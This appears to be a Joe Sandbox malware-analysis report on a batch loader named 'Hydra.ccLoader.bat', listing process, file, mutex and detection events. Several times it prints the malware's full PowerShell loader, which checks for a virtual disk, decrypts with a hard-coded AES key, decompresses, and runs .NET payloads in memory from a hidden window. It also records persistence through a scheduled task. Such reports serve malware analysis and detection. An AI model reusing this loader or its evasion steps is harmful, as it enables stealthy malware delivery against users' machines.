Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1C92C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,	14_2_00000262F1C92C80

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$rbx-onimai2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\System32\Tasks\$nya-iM0vfZcH	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$nya-onimai2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\$nya-onimai2\MzWhoQ.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\$rbx-onimai2

Source: C:\Windows\System32\dllhost.exe	Code function: 7_2_0000000140001CF0	7_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exe	Code function: 7_2_0000000140002D4C	7_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe	Code function: 7_2_00000001400031D0	7_2_00000001400031D0
Source: C:\Windows\System32\dllhost.exe	Code function: 7_2_0000000140001274	7_2_0000000140001274
Source: C:\Windows\System32\dllhost.exe	Code function: 7_2_0000000140002434	7_2_0000000140002434
Source: C:\Windows\System32\winlogon.exe	Code function: 8_3_000001CA7D1BCE18	8_3_000001CA7D1BCE18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_3_000001CA7D1BCC94	8_3_000001CA7D1BCC94
Source: C:\Windows\System32\winlogon.exe	Code function: 8_3_000001CA7D1B23F0	8_3_000001CA7D1B23F0
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D1EDA18	8_2_000001CA7D1EDA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D1ED894	8_2_000001CA7D1ED894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D1E2FF0	8_2_000001CA7D1E2FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D21DA18	8_2_000001CA7D21DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D21D894	8_2_000001CA7D21D894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D212FF0	8_2_000001CA7D212FF0
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D29DA18	8_2_000001CA7D29DA18
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D29D894	8_2_000001CA7D29D894
Source: C:\Windows\System32\winlogon.exe	Code function: 8_2_000001CA7D292FF0	8_2_000001CA7D292FF0
Source: C:\Windows\System32\lsass.exe	Code function: 9_3_0000017D2DD2CE18	9_3_0000017D2DD2CE18
Source: C:\Windows\System32\lsass.exe	Code function: 9_3_0000017D2DD2CC94	9_3_0000017D2DD2CC94
Source: C:\Windows\System32\lsass.exe	Code function: 9_3_0000017D2DD223F0	9_3_0000017D2DD223F0
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD5DA18	9_2_0000017D2DD5DA18
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD5D894	9_2_0000017D2DD5D894
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD52FF0	9_2_0000017D2DD52FF0
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD8DA18	9_2_0000017D2DD8DA18
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD8D894	9_2_0000017D2DD8D894
Source: C:\Windows\System32\lsass.exe	Code function: 9_2_0000017D2DD82FF0	9_2_0000017D2DD82FF0
Source: C:\Windows\System32\svchost.exe	Code function: 12_3_0000022F4B8F23F0	12_3_0000022F4B8F23F0
Source: C:\Windows\System32\svchost.exe	Code function: 12_3_0000022F4B8FCE18	12_3_0000022F4B8FCE18
Source: C:\Windows\System32\svchost.exe	Code function: 12_3_0000022F4B8FCC94	12_3_0000022F4B8FCC94
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000022F4B922FF0	12_2_0000022F4B922FF0
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000022F4B92DA18	12_2_0000022F4B92DA18
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000022F4B92D894	12_2_0000022F4B92D894
Source: C:\Windows\System32\dwm.exe	Code function: 14_3_00000262F20ACC94	14_3_00000262F20ACC94
Source: C:\Windows\System32\dwm.exe	Code function: 14_3_00000262F20ACE18	14_3_00000262F20ACE18
Source: C:\Windows\System32\dwm.exe	Code function: 14_3_00000262F20A23F0	14_3_00000262F20A23F0
Source: C:\Windows\System32\dwm.exe	Code function: 14_3_00000262F1CD23F0	14_3_00000262F1CD23F0
Source: C:\Windows\System32\dwm.exe	Code function: 14_3_00000262F1CDCE18	14_3_00000262F1CDCE18
Source: C:\Windows\System32\dwm.exe	Code function: 14_3_00000262F1CDCC94	14_3_00000262F1CDCC94
Source: C:\Windows\System32\dwm.exe	Code function: 14_3_00000262F1DC23F0	14_3_00000262F1DC23F0
Source: C:\Windows\System32\dwm.exe	Code function: 14_3_00000262F1DCCE18	14_3_00000262F1DCCE18
Source: C:\Windows\System32\dwm.exe	Code function: 14_3_00000262F1DCCC94	14_3_00000262F1DCCC94
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1C92FF0	14_2_00000262F1C92FF0
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1C9DA18	14_2_00000262F1C9DA18
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1C9D894	14_2_00000262F1C9D894
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1D02FF0	14_2_00000262F1D02FF0
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1D0DA18	14_2_00000262F1D0DA18
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1D0D894	14_2_00000262F1D0D894
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1DF2FF0	14_2_00000262F1DF2FF0
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1DFDA18	14_2_00000262F1DFDA18
Source: C:\Windows\System32\dwm.exe	Code function: 14_2_00000262F1DFD894	14_2_00000262F1DFD894
Source: C:\Windows\System32\cmd.exe	Code function: 15_3_000001C115C4CE18	15_3_000001C115C4CE18
Source: C:\Windows\System32\cmd.exe	Code function: 15_3_000001C115C4CC94	15_3_000001C115C4CC94
Source: C:\Windows\System32\cmd.exe	Code function: 15_3_000001C115C423F0	15_3_000001C115C423F0
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115C7DA18	15_2_000001C115C7DA18
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115C7D894	15_2_000001C115C7D894
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115C72FF0	15_2_000001C115C72FF0
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115CADA18	15_2_000001C115CADA18
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115CAD894	15_2_000001C115CAD894
Source: C:\Windows\System32\cmd.exe	Code function: 15_2_000001C115CA2FF0	15_2_000001C115CA2FF0
Source: C:\Windows\System32\conhost.exe	Code function: 16_3_000001BB497C23F0	16_3_000001BB497C23F0
Source: C:\Windows\System32\conhost.exe	Code function: 16_3_000001BB497CCE18	16_3_000001BB497CCE18
Source: C:\Windows\System32\conhost.exe	Code function: 16_3_000001BB497CCC94	16_3_000001BB497CCC94
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_000001BB497F2FF0	16_2_000001BB497F2FF0
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_000001BB497FDA18	16_2_000001BB497FDA18
Source: C:\Windows\System32\conhost.exe	Code function: 16_2_000001BB497FD894	16_2_000001BB497FD894
Source: C:\Windows\System32\svchost.exe	Code function: 19_3_0000023942AECE18	19_3_0000023942AECE18
Source: C:\Windows\System32\svchost.exe	Code function: 19_3_0000023942AE23F0	19_3_0000023942AE23F0
Source: C:\Windows\System32\svchost.exe	Code function: 19_3_0000023942AECC94	19_3_0000023942AECC94
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_0000023942B1DA18	19_2_0000023942B1DA18
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_0000023942B12FF0	19_2_0000023942B12FF0
Source: C:\Windows\System32\svchost.exe	Code function: 19_2_0000023942B1D894	19_2_0000023942B1D894
Source: C:\Windows\System32\svchost.exe	Code function: 20_3_000002234E1023F0	20_3_000002234E1023F0
Source: C:\Windows\System32\svchost.exe	Code function: 20_3_000002234E10CC94	20_3_000002234E10CC94
Source: C:\Windows\System32\svchost.exe	Code function: 20_3_000002234E10CE18	20_3_000002234E10CE18
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E132FF0	20_2_000002234E132FF0
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E13D894	20_2_000002234E13D894
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E13DA18	20_2_000002234E13DA18
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E162FF0	20_2_000002234E162FF0
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E16D894	20_2_000002234E16D894
Source: C:\Windows\System32\svchost.exe	Code function: 20_2_000002234E16DA18	20_2_000002234E16DA18
Source: C:\Windows\System32\svchost.exe	Code function: 21_3_000001EF056ACC94	21_3_000001EF056ACC94
Source: C:\Windows\System32\svchost.exe	Code function: 21_3_000001EF056A23F0	21_3_000001EF056A23F0
Source: C:\Windows\System32\svchost.exe	Code function: 21_3_000001EF056ACE18	21_3_000001EF056ACE18
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF056DD894	21_2_000001EF056DD894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF056D2FF0	21_2_000001EF056D2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF056DDA18	21_2_000001EF056DDA18
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF0570D894	21_2_000001EF0570D894
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF05702FF0	21_2_000001EF05702FF0
Source: C:\Windows\System32\svchost.exe	Code function: 21_2_000001EF0570DA18	21_2_000001EF0570DA18
Source: C:\Windows\System32\svchost.exe	Code function: 22_3_000002287AD423F0	22_3_000002287AD423F0
Source: C:\Windows\System32\svchost.exe	Code function: 22_3_000002287AD4CC94	22_3_000002287AD4CC94
Source: C:\Windows\System32\svchost.exe	Code function: 22_3_000002287AD4CE18	22_3_000002287AD4CE18
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000002287AD72FF0	22_2_000002287AD72FF0
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000002287AD7D894	22_2_000002287AD7D894
Source: C:\Windows\System32\svchost.exe	Code function: 22_2_000002287AD7DA18	22_2_000002287AD7DA18
Source: C:\Windows\System32\svchost.exe	Code function: 23_3_000001B94DA6CC94	23_3_000001B94DA6CC94
Source: C:\Windows\System32\svchost.exe	Code function: 23_3_000001B94DA623F0	23_3_000001B94DA623F0
Source: C:\Windows\System32\svchost.exe	Code function: 23_3_000001B94DA6CE18	23_3_000001B94DA6CE18
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001B94DA9D894	23_2_000001B94DA9D894
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001B94DA92FF0	23_2_000001B94DA92FF0
Source: C:\Windows\System32\svchost.exe	Code function: 23_2_000001B94DA9DA18	23_2_000001B94DA9DA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_3_000002520254CE18	24_3_000002520254CE18
Source: C:\Windows\System32\svchost.exe	Code function: 24_3_00000252025423F0	24_3_00000252025423F0
Source: C:\Windows\System32\svchost.exe	Code function: 24_3_000002520254CC94	24_3_000002520254CC94
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000002520257DA18	24_2_000002520257DA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_0000025202572FF0	24_2_0000025202572FF0
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000002520257D894	24_2_000002520257D894
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000252025ADA18	24_2_00000252025ADA18
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000252025A2FF0	24_2_00000252025A2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_00000252025AD894	24_2_00000252025AD894
Source: C:\Windows\System32\svchost.exe	Code function: 25_3_000001A9EBF923F0	25_3_000001A9EBF923F0
Source: C:\Windows\System32\svchost.exe	Code function: 25_3_000001A9EBF9CE18	25_3_000001A9EBF9CE18
Source: C:\Windows\System32\svchost.exe	Code function: 25_3_000001A9EBF9CC94	25_3_000001A9EBF9CC94
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE603A	25_2_000001A9EBFE603A
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE6008	25_2_000001A9EBFE6008
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFC2FF0	25_2_000001A9EBFC2FF0
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5FE9	25_2_000001A9EBFE5FE9
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE57B0	25_2_000001A9EBFE57B0
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5F8F	25_2_000001A9EBFE5F8F
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5F7F	25_2_000001A9EBFE5F7F
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5F50	25_2_000001A9EBFE5F50
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5F40	25_2_000001A9EBFE5F40
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5F30	25_2_000001A9EBFE5F30
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5F00	25_2_000001A9EBFE5F00
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5EF0	25_2_000001A9EBFE5EF0
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5EE0	25_2_000001A9EBFE5EE0
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5EB0	25_2_000001A9EBFE5EB0
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5EA0	25_2_000001A9EBFE5EA0
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5E90	25_2_000001A9EBFE5E90
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5DA0	25_2_000001A9EBFE5DA0
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5D60	25_2_000001A9EBFE5D60
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5D20	25_2_000001A9EBFE5D20
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5D10	25_2_000001A9EBFE5D10
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5C7F	25_2_000001A9EBFE5C7F
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5C60	25_2_000001A9EBFE5C60
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5C10	25_2_000001A9EBFE5C10
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFCDA18	25_2_000001A9EBFCDA18
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE59E0	25_2_000001A9EBFE59E0
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5990	25_2_000001A9EBFE5990
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5940	25_2_000001A9EBFE5940
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE6138	25_2_000001A9EBFE6138
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE5900	25_2_000001A9EBFE5900
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE60FA	25_2_000001A9EBFE60FA
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE60D9	25_2_000001A9EBFE60D9
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFCD894	25_2_000001A9EBFCD894
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EBFE6089	25_2_000001A9EBFE6089
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EC68D894	25_2_000001A9EC68D894
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EC68DA18	25_2_000001A9EC68DA18
Source: C:\Windows\System32\svchost.exe	Code function: 25_2_000001A9EC682FF0	25_2_000001A9EC682FF0

Source: Joe Sandbox View

Dropped File: C:\Windows\$nya-onimai2\MzWhoQ.exe 878DF6F755578E2E79D0E6FD350F5B4430E0E42BB4BC8757AFB97999BC405BA4

Source: MzWhoQ.exe.35.dr

Static PE information: No import functions for PE file found

Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2182
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2173
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2182	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 2173	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spyw.evad.winBAT@30/16@1/2

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,

7_2_0000000140002D4C

Source: C:\Windows\System32\dllhost.exe

Code function: 7_2_000000014000217C SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

7_2_000000014000217C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\791ad183-7abe-425d-9d45-9b1abbbf8f56
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h1kok5rx.inc.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Hydra.ccLoader.bat" "

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wbem\WMIC.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Hydra.ccLoader.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object System.IO.MemoryStream(,$iUuMH);'.Replace('', ''); Invoke-Expression '$yWDGv=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$RiWlb=New-Object System.IO.Compression.GZipStream($jKyNf, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[System.Reflection.Assembly]::Load([byte[]]$iUuMH);'.Replace('', ''); Invoke-Expression '$nGmNE=$VDuEP.EntryPoint;'.Replace('', ''); Invoke-Expression '$nGmNE.Invoke($null, $wjUzC);'.Replace('', '');}$XtHlN = 'C:\Users\user\Desktop\Hydra.ccLoader.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a7d7aefc-34fa-4c44-83e0-dba733732ecf}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\Hydra.ccLoader.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object System.IO.MemoryStream(,$iUuMH);'.Replace('', ''); Invoke-Expression '$yWDGv=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$RiWlb=New-Object System.IO.Compression.GZipStream($jKyNf, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[System.Reflection.Assembly]::Load([byte[]]$iUuMH);'.Replace('', ''); Invoke-Expression '$nGmNE=$VDuEP.EntryPoint;'.Replace('', ''); Invoke-Expression '$nGmNE.Invoke($null, $wjUzC);'.Replace('', '');}$XtHlN = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $XtHlN;$pkwbz=[System.IO.File]::ReadAllText($XtHlN).Split([Environment]::NewLine);foreach ($GxnwH in $pkwbz) { if ($GxnwH.StartsWith('VEYmI')) { $jXznR=$GxnwH.Substring(5); break; }}$ELwUb=[string[]]$jXznR.Split('\');Invoke-Expression '$muS = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[0].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Ray = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[1].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Invoke-Expression '$Acu = ODxLi (LaqSe ([Convert]::FromBase64String($ELwUb[2].Replace("#", "/").Replace("@", "A"))));'.Replace('', '');Kbrbr $muS $null;Kbrbr $Ray $null;Kbrbr $Acu (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\winlogon.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d7046f2c-bae2-4413-95a8-3c99656fab22}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function LaqSe($iUuMH){ $vwFBp=[System.Security.Cryptography.Aes]::Create(); $vwFBp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $vwFBp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $vwFBp.Key=[System.Convert]::FromBase64String('di4DDcyzTs705Y2cfJCrjbU5+7IUB/rxfDRBd9BuRKs='); $vwFBp.IV=[System.Convert]::FromBase64String('Zryk7n3AWcgs6SOqeB0/YQ=='); $mWNkD=$vwFBp.CreateDecryptor(); $FMJVb=$mWNkD.TransformFinalBlock($iUuMH, 0, $iUuMH.Length); $mWNkD.Dispose(); $vwFBp.Dispose(); $FMJVb;}function ODxLi($iUuMH){ Invoke-Expression '$jKyNf=New-Object System.IO.MemoryStream(,$iUuMH);'.Replace('', ''); Invoke-Expression '$yWDGv=New-Object System.IO.MemoryStream;'.Replace('', ''); Invoke-Expression '$RiWlb=New-Object System.IO.Compression.GZipStream($jKyNf, [IO.Compression.CompressionMode]::Decompress);'.Replace('', ''); $RiWlb.CopyTo($yWDGv); $RiWlb.Dispose(); $jKyNf.Dispose(); $yWDGv.Dispose(); $yWDGv.ToArray();}function Kbrbr($iUuMH,$wjUzC){ Invoke-Expression '$VDuEP=[System.Reflection.Assembly]::Load([byte[]]$iUuMH);'.Replace('', ''); Invoke-Expression '$nGmNE=$VDuEP.EntryPoint;'.Replace('', ''); Invoke-Expression '$nGmNE.Invoke($null, $wjUzC);'.Replace('', '');}$XtHlN = 